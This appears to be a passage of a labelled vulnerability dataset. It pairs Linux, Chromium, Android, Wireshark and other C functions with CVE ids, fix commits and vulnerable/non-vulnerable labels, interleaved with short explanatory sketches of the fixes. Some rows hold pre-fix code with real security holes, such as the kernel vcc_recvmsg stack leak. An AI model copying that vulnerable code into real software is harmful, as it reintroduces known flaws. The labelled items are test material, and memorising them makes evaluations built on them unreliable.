opt->type, pl, p); if (len < 0) return -1; e = strlen(prefix) + strlen(opt->var) + len + 4; v = val = *ep++ = xmalloc(e); v += snprintf(val, e, "%s_%s=", prefix, opt->var); if (len != 0) print_option(v, len, opt->type, pl, p); } return ep - env; }
C
Android
0
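The improved length checks this commit message describes boil down to validating every DHCP option's code, length byte, and payload against the bytes actually remaining before consuming them. A self-contained sketch of that TLV walk:

#include <stddef.h>
#include <stdint.h>

/* returns a pointer to the payload of option `want` and stores its
 * length, or NULL if the option is absent or the buffer is malformed */
static const uint8_t *find_option(const uint8_t *p, size_t len,
                                  uint8_t want, size_t *optlen)
{
    while (len >= 2) {                 /* need at least code + length */
        uint8_t code = p[0];
        if (code == 255)               /* DHO_END */
            break;
        if (code == 0) {               /* DHO_PAD is a single byte */
            p++; len--;
            continue;
        }
        uint8_t olen = p[1];
        if ((size_t)olen + 2 > len)    /* payload must fit in the buffer */
            return NULL;               /* truncated option: reject */
        if (code == want) {
            *optlen = olen;
            return p + 2;
        }
        p += (size_t)olen + 2;
        len -= (size_t)olen + 2;
    }
    return NULL;
}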
CVE-2013-0892
https://www.cvedetails.com/cve/CVE-2013-0892/
null
https://github.com/chromium/chromium/commit/da5e5f78f02bc0af5ddc5694090defbef7853af1
da5e5f78f02bc0af5ddc5694090defbef7853af1
DevTools: remove references to modules/device_orientation from core BUG=340221 Review URL: https://codereview.chromium.org/150913003 git-svn-id: svn://svn.chromium.org/blink/trunk@166493 bbb929c8-8fbe-4397-9dbb-9b2b20218538
void InspectorPageAgent::captureScreenshot(ErrorString*, const String*, const int*, const int*, const int*, String*, RefPtr<TypeBuilder::Page::ScreencastFrameMetadata>&) { }
void InspectorPageAgent::captureScreenshot(ErrorString*, const String*, const int*, const int*, const int*, String*, RefPtr<TypeBuilder::Page::ScreencastFrameMetadata>&) { }
C
Chrome
0
CVE-2013-3226
https://www.cvedetails.com/cve/CVE-2013-3226/
CWE-200
https://github.com/torvalds/linux/commit/c8c499175f7d295ef867335bceb9a76a2c3cdc38
c8c499175f7d295ef867335bceb9a76a2c3cdc38
Bluetooth: SCO - Fix missing msg_namelen update in sco_sock_recvmsg() If the socket is in state BT_CONNECT2 and BT_SK_DEFER_SETUP is set in the flags, sco_sock_recvmsg() returns early with 0 without updating the possibly set msg_namelen member. This, in turn, leads to a 128 byte kernel stack leak in net/socket.c. Fix this by updating msg_namelen in this case. For all other cases it will be handled in bt_sock_recvmsg(). Cc: Marcel Holtmann <[email protected]> Cc: Gustavo Padovan <[email protected]> Cc: Johan Hedberg <[email protected]> Signed-off-by: Mathias Krause <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static void sco_sock_init(struct sock *sk, struct sock *parent) { BT_DBG("sk %p", sk); if (parent) { sk->sk_type = parent->sk_type; bt_sk(sk)->flags = bt_sk(parent)->flags; security_sk_clone(parent, sk); } }
static void sco_sock_init(struct sock *sk, struct sock *parent) { BT_DBG("sk %p", sk); if (parent) { sk->sk_type = parent->sk_type; bt_sk(sk)->flags = bt_sk(parent)->flags; security_sk_clone(parent, sk); } }
C
linux
0
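The one-liner this commit message describes generalizes: any recvmsg-style handler that returns early must still set msg_namelen, or whatever happens to be on the caller's stack is copied back to user space. Sketched with a stand-in msghdr type rather than the kernel's:

struct msghdr_sketch {
    void *msg_name;
    int msg_namelen;
};

static int recvmsg_sketch(struct msghdr_sketch *msg, int defer_setup)
{
    if (defer_setup) {
        msg->msg_namelen = 0;   /* the fix: no address returned, say so */
        return 0;               /* early return no longer leaks stack bytes */
    }
    msg->msg_namelen = 0;       /* normal path: set only when msg_name is filled */
    return 0;
}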
CVE-2012-2375
https://www.cvedetails.com/cve/CVE-2012-2375/
CWE-189
https://github.com/torvalds/linux/commit/20e0fa98b751facf9a1101edaefbc19c82616a68
20e0fa98b751facf9a1101edaefbc19c82616a68
Fix length of buffer copied in __nfs4_get_acl_uncached _copy_from_pages() used to copy data from the temporary buffer to the user passed buffer is passed the wrong size parameter when copying data. res.acl_len contains both the bitmap and acl lenghts while acl_len contains the acl length after adjusting for the bitmap size. Signed-off-by: Sachin Prabhu <[email protected]> Signed-off-by: Trond Myklebust <[email protected]>
static void nfs_set_open_stateid(struct nfs4_state *state, nfs4_stateid *stateid, fmode_t fmode) { write_seqlock(&state->seqlock); nfs_set_open_stateid_locked(state, stateid, fmode); write_sequnlock(&state->seqlock); }
static void nfs_set_open_stateid(struct nfs4_state *state, nfs4_stateid *stateid, fmode_t fmode) { write_seqlock(&state->seqlock); nfs_set_open_stateid_locked(state, stateid, fmode); write_sequnlock(&state->seqlock); }
C
linux
0
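The length mix-up this commit message describes is easy to restate: when a reply buffer holds a bitmap followed by the ACL, the copy to the caller must use the ACL-only length, not the combined one, or it reads past the end of the ACL data. A generic sketch (the real code copies with _copy_from_pages over XDR pages; this memcpy stand-in assumes total_len >= bitmap_len):

#include <string.h>

static void copy_acl_sketch(char *dst, const char *reply,
                            size_t bitmap_len, size_t total_len)
{
    size_t acl_len = total_len - bitmap_len;  /* adjust for the bitmap */
    /* the bug passed total_len here, copying bitmap_len extra bytes */
    memcpy(dst, reply + bitmap_len, acl_len);
}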
CVE-2016-5354
https://www.cvedetails.com/cve/CVE-2016-5354/
CWE-476
https://github.com/wireshark/wireshark/commit/2cb5985bf47bdc8bea78d28483ed224abdd33dc6
2cb5985bf47bdc8bea78d28483ed224abdd33dc6
Make class "type" for USB conversations. USB dissectors can't assume that only their class type has been passed around in the conversation. Make explicit check that class type expected matches the dissector and stop/prevent dissection if there isn't a match. Bug: 12356 Change-Id: Ib23973a4ebd0fbb51952ffc118daf95e3389a209 Reviewed-on: https://code.wireshark.org/review/15212 Petri-Dish: Michael Mann <[email protected]> Reviewed-by: Martin Kaiser <[email protected]> Petri-Dish: Martin Kaiser <[email protected]> Tested-by: Petri Dish Buildbot <[email protected]> Reviewed-by: Michael Mann <[email protected]>
dissect_usb_vid_interrupt(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void *data) { usb_conv_info_t *usb_conv_info; gint bytes_available; int offset = 0; usb_conv_info = (usb_conv_info_t *)data; bytes_available = tvb_reported_length_remaining(tvb, offset); col_set_str(pinfo->cinfo, COL_PROTOCOL, "USBVIDEO"); if (bytes_available > 0) { guint8 originating_interface; guint8 originating_entity; originating_interface = tvb_get_guint8(tvb, offset) & INT_ORIGINATOR_MASK; proto_tree_add_item(tree, hf_usb_vid_interrupt_bStatusType, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; originating_entity = tvb_get_guint8(tvb, offset); proto_tree_add_item(tree, hf_usb_vid_interrupt_bOriginator, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; if (originating_interface == INT_VIDEOCONTROL) { guint8 control_sel; guint8 attribute; const gchar *control_name; proto_tree_add_item(tree, hf_usb_vid_control_interrupt_bEvent, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; control_sel = tvb_get_guint8(tvb, offset); control_name = get_control_selector_name(originating_entity, control_sel, usb_conv_info); if (!control_name) control_name = "Unknown"; proto_tree_add_uint_format_value(tree, hf_usb_vid_control_selector, tvb, offset, 1, control_sel, "%s (0x%02x)", control_name, control_sel); offset++; attribute = tvb_get_guint8(tvb, offset); proto_tree_add_item(tree, hf_usb_vid_interrupt_bAttribute, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; switch (attribute) { case CONTROL_CHANGE_FAILURE: proto_tree_add_item(tree, hf_usb_vid_request_error, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; break; case CONTROL_CHANGE_INFO: offset = dissect_usb_vid_control_info(tree, tvb, offset); break; case CONTROL_CHANGE_VALUE: case CONTROL_CHANGE_MIN: case CONTROL_CHANGE_MAX: dissect_usb_vid_control_value(tree, tvb, offset, attribute); offset += tvb_reported_length_remaining(tvb, offset); break; default: proto_tree_add_item(tree, hf_usb_vid_value_data, tvb, offset, -1, ENC_NA); offset += tvb_reported_length_remaining(tvb, offset); break; } } else if (originating_interface == INT_VIDEOSTREAMING) { /* @todo */ } } else offset = -2; return offset; }
dissect_usb_vid_interrupt(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void *data) { usb_conv_info_t *usb_conv_info; gint bytes_available; int offset = 0; usb_conv_info = (usb_conv_info_t *)data; bytes_available = tvb_reported_length_remaining(tvb, offset); col_set_str(pinfo->cinfo, COL_PROTOCOL, "USBVIDEO"); if (bytes_available > 0) { guint8 originating_interface; guint8 originating_entity; originating_interface = tvb_get_guint8(tvb, offset) & INT_ORIGINATOR_MASK; proto_tree_add_item(tree, hf_usb_vid_interrupt_bStatusType, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; originating_entity = tvb_get_guint8(tvb, offset); proto_tree_add_item(tree, hf_usb_vid_interrupt_bOriginator, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; if (originating_interface == INT_VIDEOCONTROL) { guint8 control_sel; guint8 attribute; const gchar *control_name; proto_tree_add_item(tree, hf_usb_vid_control_interrupt_bEvent, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; control_sel = tvb_get_guint8(tvb, offset); control_name = get_control_selector_name(originating_entity, control_sel, usb_conv_info); if (!control_name) control_name = "Unknown"; proto_tree_add_uint_format_value(tree, hf_usb_vid_control_selector, tvb, offset, 1, control_sel, "%s (0x%02x)", control_name, control_sel); offset++; attribute = tvb_get_guint8(tvb, offset); proto_tree_add_item(tree, hf_usb_vid_interrupt_bAttribute, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; switch (attribute) { case CONTROL_CHANGE_FAILURE: proto_tree_add_item(tree, hf_usb_vid_request_error, tvb, offset, 1, ENC_LITTLE_ENDIAN); offset++; break; case CONTROL_CHANGE_INFO: offset = dissect_usb_vid_control_info(tree, tvb, offset); break; case CONTROL_CHANGE_VALUE: case CONTROL_CHANGE_MIN: case CONTROL_CHANGE_MAX: dissect_usb_vid_control_value(tree, tvb, offset, attribute); offset += tvb_reported_length_remaining(tvb, offset); break; default: proto_tree_add_item(tree, hf_usb_vid_value_data, tvb, offset, -1, ENC_NA); offset += tvb_reported_length_remaining(tvb, offset); break; } } else if (originating_interface == INT_VIDEOSTREAMING) { /* @todo */ } } else offset = -2; return offset; }
C
wireshark
0
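The guard this commit message adds can be sketched generically: a class dissector looks up per-conversation state, and before treating it as its own it must check a class tag, because USB conversations may have been populated by a different class's dissector. Types and constants below are illustrative, not Wireshark's:

#include <stddef.h>

enum conv_class { CONV_CLASS_UNKNOWN = 0, CONV_CLASS_VIDEO, CONV_CLASS_AUDIO };

struct conv_info_sketch {
    enum conv_class class_data_type;
    void *class_data;
};

static int dissect_video_sketch(struct conv_info_sketch *info)
{
    if (info == NULL || info->class_data_type != CONV_CLASS_VIDEO)
        return 0;   /* not ours: decline instead of reinterpreting
                     * another class's data (the NULL-deref risk here) */
    /* safe to use info->class_data as video-class state from here on */
    return 1;
}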
CVE-2016-2496
https://www.cvedetails.com/cve/CVE-2016-2496/
CWE-264
https://android.googlesource.com/platform/frameworks/native/+/03a53d1c7765eeb3af0bc34c3dff02ada1953fbf
03a53d1c7765eeb3af0bc34c3dff02ada1953fbf
Add new MotionEvent flag for partially obscured windows. Due to more complex window layouts resulting in lots of overlapping windows, the policy around FLAG_WINDOW_IS_OBSCURED has changed to only be set when the point at which the window was touched is obscured. Unfortunately, this doesn't prevent tapjacking attacks that overlay the dialog's text, making a potentially dangerous operation seem innocuous. To avoid this on particularly sensitive dialogs, introduce a new flag that really does tell you when your window is being even partially overlapped. We aren't exposing this as API since we plan on making the original flag more robust. This is really a workaround for system dialogs since we generally know their layout and screen position, and that they're unlikely to be overlapped by other applications. Bug: 26677796 Change-Id: I9e336afe90f262ba22015876769a9c510048fd47
InputDispatcher::DeviceResetEntry::~DeviceResetEntry() { }
InputDispatcher::DeviceResetEntry::~DeviceResetEntry() { }
C
Android
0
CVE-2013-7271
https://www.cvedetails.com/cve/CVE-2013-7271/
CWE-20
https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
net: rework recvmsg handler msg_name and msg_namelen logic This patch now always passes msg->msg_namelen as 0. recvmsg handlers must set msg_namelen to the proper size <= sizeof(struct sockaddr_storage) to return msg_name to the user. This prevents numerous uninitialized memory leaks we had in the recvmsg handlers and makes it harder for new code to accidentally leak uninitialized memory. Optimize for the case recvfrom is called with NULL as address. We don't need to copy the address at all, so set it to NULL before invoking the recvmsg handler. We can do so, because all the recvmsg handlers must cope with the case a plain read() is called on them. read() also sets msg_name to NULL. Also document these changes in include/linux/net.h as suggested by David Miller. Changes since RFC: Set msg->msg_name = NULL if user specified a NULL in msg_name but had a non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't affect sendto as it would bail out earlier while trying to copy-in the address. It also more naturally reflects the logic by the callers of verify_iovec. With this change in place I could remove " if (!uaddr || msg_sys->msg_namelen == 0) msg->msg_name = NULL ". This change does not alter the user visible error logic as we ignore msg_namelen as long as msg_name is NULL. Also remove two unnecessary curly brackets in ___sys_recvmsg and change comments to netdev style. Cc: David Miller <[email protected]> Suggested-by: Eric Dumazet <[email protected]> Signed-off-by: Hannes Frederic Sowa <[email protected]> Signed-off-by: David S. Miller <[email protected]>
int vcc_recvmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *msg, size_t size, int flags) { struct sock *sk = sock->sk; struct atm_vcc *vcc; struct sk_buff *skb; int copied, error = -EINVAL; if (sock->state != SS_CONNECTED) return -ENOTCONN; /* only handle MSG_DONTWAIT and MSG_PEEK */ if (flags & ~(MSG_DONTWAIT | MSG_PEEK)) return -EOPNOTSUPP; vcc = ATM_SD(sock); if (test_bit(ATM_VF_RELEASED, &vcc->flags) || test_bit(ATM_VF_CLOSE, &vcc->flags) || !test_bit(ATM_VF_READY, &vcc->flags)) return 0; skb = skb_recv_datagram(sk, flags, flags & MSG_DONTWAIT, &error); if (!skb) return error; copied = skb->len; if (copied > size) { copied = size; msg->msg_flags |= MSG_TRUNC; } error = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied); if (error) return error; sock_recv_ts_and_drops(msg, sk, skb); if (!(flags & MSG_PEEK)) { pr_debug("%d -= %d\n", atomic_read(&sk->sk_rmem_alloc), skb->truesize); atm_return(vcc, skb->truesize); } skb_free_datagram(sk, skb); return copied; }
int vcc_recvmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *msg, size_t size, int flags) { struct sock *sk = sock->sk; struct atm_vcc *vcc; struct sk_buff *skb; int copied, error = -EINVAL; msg->msg_namelen = 0; if (sock->state != SS_CONNECTED) return -ENOTCONN; /* only handle MSG_DONTWAIT and MSG_PEEK */ if (flags & ~(MSG_DONTWAIT | MSG_PEEK)) return -EOPNOTSUPP; vcc = ATM_SD(sock); if (test_bit(ATM_VF_RELEASED, &vcc->flags) || test_bit(ATM_VF_CLOSE, &vcc->flags) || !test_bit(ATM_VF_READY, &vcc->flags)) return 0; skb = skb_recv_datagram(sk, flags, flags & MSG_DONTWAIT, &error); if (!skb) return error; copied = skb->len; if (copied > size) { copied = size; msg->msg_flags |= MSG_TRUNC; } error = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied); if (error) return error; sock_recv_ts_and_drops(msg, sk, skb); if (!(flags & MSG_PEEK)) { pr_debug("%d -= %d\n", atomic_read(&sk->sk_rmem_alloc), skb->truesize); atm_return(vcc, skb->truesize); } skb_free_datagram(sk, skb); return copied; }
C
linux
1
CVE-2011-4112
https://www.cvedetails.com/cve/CVE-2011-4112/
CWE-264
https://github.com/torvalds/linux/commit/550fd08c2cebad61c548def135f67aba284c6162
550fd08c2cebad61c548def135f67aba284c6162
net: Audit drivers to identify those needing IFF_TX_SKB_SHARING cleared After the last patch, We are left in a state in which only drivers calling ether_setup have IFF_TX_SKB_SHARING set (we assume that drivers touching real hardware call ether_setup for their net_devices and don't hold any state in their skbs. There are a handful of drivers that violate this assumption of course, and need to be fixed up. This patch identifies those drivers, and marks them as not being able to support the safe transmission of skbs by clearning the IFF_TX_SKB_SHARING flag in priv_flags Signed-off-by: Neil Horman <[email protected]> CC: Karsten Keil <[email protected]> CC: "David S. Miller" <[email protected]> CC: Jay Vosburgh <[email protected]> CC: Andy Gospodarek <[email protected]> CC: Patrick McHardy <[email protected]> CC: Krzysztof Halasa <[email protected]> CC: "John W. Linville" <[email protected]> CC: Greg Kroah-Hartman <[email protected]> CC: Marcel Holtmann <[email protected]> CC: Johannes Berg <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static void bond_ethtool_get_drvinfo(struct net_device *bond_dev, struct ethtool_drvinfo *drvinfo) { strncpy(drvinfo->driver, DRV_NAME, 32); strncpy(drvinfo->version, DRV_VERSION, 32); snprintf(drvinfo->fw_version, 32, "%d", BOND_ABI_VERSION); }
static void bond_ethtool_get_drvinfo(struct net_device *bond_dev, struct ethtool_drvinfo *drvinfo) { strncpy(drvinfo->driver, DRV_NAME, 32); strncpy(drvinfo->version, DRV_VERSION, 32); snprintf(drvinfo->fw_version, 32, "%d", BOND_ABI_VERSION); }
C
linux
0
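The audit this commit message describes leaves affected drivers with a two-line recipe: ether_setup() sets IFF_TX_SKB_SHARING by default, and any virtual device that keeps state in its skbs must clear it again. A kernel-context sketch:

#include <linux/etherdevice.h>
#include <linux/netdevice.h>

static void shared_skb_unsafe_setup(struct net_device *dev)
{
    ether_setup(dev);                        /* sets IFF_TX_SKB_SHARING */
    dev->priv_flags &= ~IFF_TX_SKB_SHARING;  /* this device cannot share skbs */
}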
CVE-2007-5199
https://www.cvedetails.com/cve/CVE-2007-5199/
CWE-119
https://cgit.freedesktop.org/xorg/lib/libXfont/commit/?id=5bf703700ee4a5d6eae20da07cb7a29369667aef
5bf703700ee4a5d6eae20da07cb7a29369667aef
null
ComparePriority(const void *p1, const void *p2) { FontDirectoryPtr dir1 = (*(FontPathElementPtr*) p1)->private; FontDirectoryPtr dir2 = (*(FontPathElementPtr*) p2)->private; const char *pri1 = NULL; const char *pri2 = NULL; if (dir1->attributes != NULL) pri1 = strstr(dir1->attributes, PriorityAttribute); if (dir2->attributes != NULL) pri2 = strstr(dir2->attributes, PriorityAttribute); if (pri1 == NULL && pri2 == NULL) return 0; else if (pri1 == NULL) return 1; else if (pri2 == NULL) return -1; else return atoi(pri1 + strlen(PriorityAttribute)) - atoi(pri2 + strlen(PriorityAttribute)); }
ComparePriority(const void *p1, const void *p2) { FontDirectoryPtr dir1 = (*(FontPathElementPtr*) p1)->private; FontDirectoryPtr dir2 = (*(FontPathElementPtr*) p2)->private; const char *pri1 = NULL; const char *pri2 = NULL; if (dir1->attributes != NULL) pri1 = strstr(dir1->attributes, PriorityAttribute); if (dir2->attributes != NULL) pri2 = strstr(dir2->attributes, PriorityAttribute); if (pri1 == NULL && pri2 == NULL) return 0; else if (pri1 == NULL) return 1; else if (pri2 == NULL) return -1; else return atoi(pri1 + strlen(PriorityAttribute)) - atoi(pri2 + strlen(PriorityAttribute)); }
C
libxfont
0
CVE-2011-2918
https://www.cvedetails.com/cve/CVE-2011-2918/
CWE-399
https://github.com/torvalds/linux/commit/a8b0ca17b80e92faab46ee7179ba9e99ccb61233
a8b0ca17b80e92faab46ee7179ba9e99ccb61233
perf: Remove the nmi parameter from the swevent and overflow interface The nmi parameter indicated if we could do wakeups from the current context, if not, we would set some state and self-IPI and let the resulting interrupt do the wakeup. For the various event classes: - hardware: nmi=0; PMI is in fact an NMI or we run irq_work_run from the PMI-tail (ARM etc.) - tracepoint: nmi=0; since tracepoint could be from NMI context. - software: nmi=[0,1]; some, like the schedule thing cannot perform wakeups, and hence need 0. As one can see, there is very little nmi=1 usage, and the down-side of not using it is that on some platforms some software events can have a jiffy delay in wakeup (when arch_irq_work_raise isn't implemented). The up-side however is that we can remove the nmi parameter and save a bunch of conditionals in fast paths. Signed-off-by: Peter Zijlstra <[email protected]> Cc: Michael Cree <[email protected]> Cc: Will Deacon <[email protected]> Cc: Deng-Cheng Zhu <[email protected]> Cc: Anton Blanchard <[email protected]> Cc: Eric B Munson <[email protected]> Cc: Heiko Carstens <[email protected]> Cc: Paul Mundt <[email protected]> Cc: David S. Miller <[email protected]> Cc: Frederic Weisbecker <[email protected]> Cc: Jason Wessel <[email protected]> Cc: Don Zickus <[email protected]> Link: http://lkml.kernel.org/n/[email protected] Signed-off-by: Ingo Molnar <[email protected]>
static void init_sched_groups_power(int cpu, struct sched_domain *sd) { WARN_ON(!sd || !sd->groups); if (cpu != group_first_cpu(sd->groups)) return; sd->groups->group_weight = cpumask_weight(sched_group_cpus(sd->groups)); update_group_power(sd, cpu); }
static void init_sched_groups_power(int cpu, struct sched_domain *sd) { WARN_ON(!sd || !sd->groups); if (cpu != group_first_cpu(sd->groups)) return; sd->groups->group_weight = cpumask_weight(sched_group_cpus(sd->groups)); update_group_power(sd, cpu); }
C
linux
0
CVE-2018-19044
https://www.cvedetails.com/cve/CVE-2018-19044/
CWE-59
https://github.com/acassen/keepalived/commit/04f2d32871bb3b11d7dc024039952f2fe2750306
04f2d32871bb3b11d7dc024039952f2fe2750306
When opening files for write, ensure they aren't symbolic links Issue #1048 identified that if, for example, a non privileged user created a symbolic link from /etc/keepalvied.data to /etc/passwd, writing to /etc/keepalived.data (which could be invoked via DBus) would cause /etc/passwd to be overwritten. This commit stops keepalived writing to pathnames where the ultimate component is a symbolic link, by setting O_NOFOLLOW whenever opening a file for writing. This might break some setups, where, for example, /etc/keepalived.data was a symbolic link to /home/fred/keepalived.data. If this was the case, instead create a symbolic link from /home/fred/keepalived.data to /tmp/keepalived.data, so that the file is still accessible via /home/fred/keepalived.data. There doesn't appear to be a way around this backward incompatibility, since even checking if the pathname is a symbolic link prior to opening for writing would create a race condition. Signed-off-by: Quentin Armitage <[email protected]>
garp_group_interface_handler(vector_t *strvec) { interface_t *ifp = if_get_by_ifname(strvec_slot(strvec, 1), IF_CREATE_IF_DYNAMIC); if (!ifp) { report_config_error(CONFIG_GENERAL_ERROR, "WARNING - interface %s specified for garp_group doesn't exist", FMT_STR_VSLOT(strvec, 1)); return; } if (ifp->garp_delay) { report_config_error(CONFIG_GENERAL_ERROR, "garp_group already specified for %s - ignoring", FMT_STR_VSLOT(strvec, 1)); return; } #ifdef _HAVE_VRRP_VMAC_ /* We cannot have a group on a vmac interface */ if (ifp->vmac_type) { report_config_error(CONFIG_GENERAL_ERROR, "Cannot specify garp_delay on a vmac (%s) - ignoring", ifp->ifname); return; } #endif ifp->garp_delay = LIST_TAIL_DATA(garp_delay); }
garp_group_interface_handler(vector_t *strvec) { interface_t *ifp = if_get_by_ifname(strvec_slot(strvec, 1), IF_CREATE_IF_DYNAMIC); if (!ifp) { report_config_error(CONFIG_GENERAL_ERROR, "WARNING - interface %s specified for garp_group doesn't exist", FMT_STR_VSLOT(strvec, 1)); return; } if (ifp->garp_delay) { report_config_error(CONFIG_GENERAL_ERROR, "garp_group already specified for %s - ignoring", FMT_STR_VSLOT(strvec, 1)); return; } #ifdef _HAVE_VRRP_VMAC_ /* We cannot have a group on a vmac interface */ if (ifp->vmac_type) { report_config_error(CONFIG_GENERAL_ERROR, "Cannot specify garp_delay on a vmac (%s) - ignoring", ifp->ifname); return; } #endif ifp->garp_delay = LIST_TAIL_DATA(garp_delay); }
C
keepalived
0
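The symlink defense this commit message describes hinges on a single open(2) flag: O_NOFOLLOW makes the open fail with ELOOP when the final path component is a symbolic link, which is exactly the /etc/keepalived.data -> /etc/passwd attack. Note it only protects the ultimate component, matching the commit's wording. A portable sketch:

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>

static FILE *fopen_write_nofollow(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0644);
    if (fd == -1) {
        if (errno == ELOOP)   /* final component is a symlink: refuse */
            fprintf(stderr, "refusing to write through symlink %s\n", path);
        return NULL;
    }
    return fdopen(fd, "w");   /* caller fclose()s as usual */
}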
null
null
null
https://github.com/chromium/chromium/commit/364fb6e517fc4fbc8196a4afba4f77b3d5300c3e
364fb6e517fc4fbc8196a4afba4f77b3d5300c3e
Add InputMethodObserver support into InputMethodBase This is a preparation CL to fix issue 164964. Following observer callbacks are defined but not yet supported by ui::InputMethodBase and its sub classes. - InputMethodObserver::OnCaretBoundsChanged - InputMethodObserver::OnInputLocaleChanged This CL makes these callbacks functional for each sub class of ui::InputMethodBase. BUG=164964 TEST=ui_unittests --gtest_filter=InputMethodBaseTest.* Review URL: https://codereview.chromium.org/48393003 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@231563 0039d316-1c4b-4281-b951-d872f2087c98
void InputMethodLinuxX11::OnInputLocaleChanged() { InputMethodBase::OnInputLocaleChanged(); }
void InputMethodLinuxX11::OnInputLocaleChanged() { }
C
Chrome
1
CVE-2017-5019
https://www.cvedetails.com/cve/CVE-2017-5019/
CWE-416
https://github.com/chromium/chromium/commit/f03ea5a5c2ff26e239dfd23e263b15da2d9cee93
f03ea5a5c2ff26e239dfd23e263b15da2d9cee93
Convert FrameHostMsg_DidAddMessageToConsole to Mojo. Note: Since this required changing the test RenderViewImplTest.DispatchBeforeUnloadCanDetachFrame, I manually re-introduced https://crbug.com/666714 locally (the bug the test was added for), and reran the test to confirm that it still covers the bug. Bug: 786836 Change-Id: I110668fa6f0f261fd2ac36bb91a8d8b31c99f4f1 Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1526270 Commit-Queue: Lowell Manners <[email protected]> Reviewed-by: Daniel Cheng <[email protected]> Reviewed-by: Camille Lamy <[email protected]> Cr-Commit-Position: refs/heads/master@{#653137}
bool RenderFrameHostImpl::CreateNetworkServiceDefaultFactoryInternal( const base::Optional<url::Origin>& origin, network::mojom::URLLoaderFactoryRequest default_factory_request) { auto* context = GetSiteInstance()->GetBrowserContext(); bool bypass_redirect_checks = false; network::mojom::TrustedURLLoaderHeaderClientPtrInfo header_client; if (base::FeatureList::IsEnabled(network::features::kNetworkService)) { GetContentClient()->browser()->WillCreateURLLoaderFactory( context, this, GetProcess()->GetID(), false /* is_navigation */, false /* is_download */, origin.value_or(url::Origin()), &default_factory_request, &header_client, &bypass_redirect_checks); } devtools_instrumentation::WillCreateURLLoaderFactory( this, false /* is_navigation */, false /* is_download */, &default_factory_request); if (GetCreateNetworkFactoryCallbackForRenderFrame().is_null()) { GetProcess()->CreateURLLoaderFactory(origin, std::move(header_client), std::move(default_factory_request)); } else { network::mojom::URLLoaderFactoryPtr original_factory; GetProcess()->CreateURLLoaderFactory(origin, std::move(header_client), mojo::MakeRequest(&original_factory)); GetCreateNetworkFactoryCallbackForRenderFrame().Run( std::move(default_factory_request), GetProcess()->GetID(), original_factory.PassInterface()); } return bypass_redirect_checks; }
bool RenderFrameHostImpl::CreateNetworkServiceDefaultFactoryInternal( const base::Optional<url::Origin>& origin, network::mojom::URLLoaderFactoryRequest default_factory_request) { auto* context = GetSiteInstance()->GetBrowserContext(); bool bypass_redirect_checks = false; network::mojom::TrustedURLLoaderHeaderClientPtrInfo header_client; if (base::FeatureList::IsEnabled(network::features::kNetworkService)) { GetContentClient()->browser()->WillCreateURLLoaderFactory( context, this, GetProcess()->GetID(), false /* is_navigation */, false /* is_download */, origin.value_or(url::Origin()), &default_factory_request, &header_client, &bypass_redirect_checks); } devtools_instrumentation::WillCreateURLLoaderFactory( this, false /* is_navigation */, false /* is_download */, &default_factory_request); if (GetCreateNetworkFactoryCallbackForRenderFrame().is_null()) { GetProcess()->CreateURLLoaderFactory(origin, std::move(header_client), std::move(default_factory_request)); } else { network::mojom::URLLoaderFactoryPtr original_factory; GetProcess()->CreateURLLoaderFactory(origin, std::move(header_client), mojo::MakeRequest(&original_factory)); GetCreateNetworkFactoryCallbackForRenderFrame().Run( std::move(default_factory_request), GetProcess()->GetID(), original_factory.PassInterface()); } return bypass_redirect_checks; }
C
Chrome
0
CVE-2011-4324
https://www.cvedetails.com/cve/CVE-2011-4324/
null
https://github.com/torvalds/linux/commit/dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
NFSv4: Convert the open and close ops to use fmode Signed-off-by: Trond Myklebust <[email protected]>
nfs_init_locked(struct inode *inode, void *opaque) { struct nfs_find_desc *desc = (struct nfs_find_desc *)opaque; struct nfs_fattr *fattr = desc->fattr; set_nfs_fileid(inode, fattr->fileid); nfs_copy_fh(NFS_FH(inode), desc->fh); return 0; }
nfs_init_locked(struct inode *inode, void *opaque) { struct nfs_find_desc *desc = (struct nfs_find_desc *)opaque; struct nfs_fattr *fattr = desc->fattr; set_nfs_fileid(inode, fattr->fileid); nfs_copy_fh(NFS_FH(inode), desc->fh); return 0; }
C
linux
0
CVE-2016-3839
https://www.cvedetails.com/cve/CVE-2016-3839/
CWE-284
https://android.googlesource.com/platform/system/bt/+/472271b153c5dc53c28beac55480a8d8434b2d5c
472271b153c5dc53c28beac55480a8d8434b2d5c
DO NOT MERGE Fix potential DoS caused by delivering signal to BT process Bug: 28885210 Change-Id: I63866d894bfca47464d6e42e3fb0357c4f94d360 Conflicts: btif/co/bta_hh_co.c btif/src/btif_core.c Merge conflict resolution of ag/1161415 (referencing ag/1164670) - Directly into mnc-mr2-release
static void *reactor_thread(void *ptr) { reactor_t *reactor = (reactor_t *)ptr; thread_running = true; reactor_start(reactor); thread_running = false; return NULL; }
static void *reactor_thread(void *ptr) { reactor_t *reactor = (reactor_t *)ptr; thread_running = true; reactor_start(reactor); thread_running = false; return NULL; }
C
Android
0
CVE-2019-5837
https://www.cvedetails.com/cve/CVE-2019-5837/
CWE-200
https://github.com/chromium/chromium/commit/04aaacb936a08d70862d6d9d7e8354721ae46be8
04aaacb936a08d70862d6d9d7e8354721ae46be8
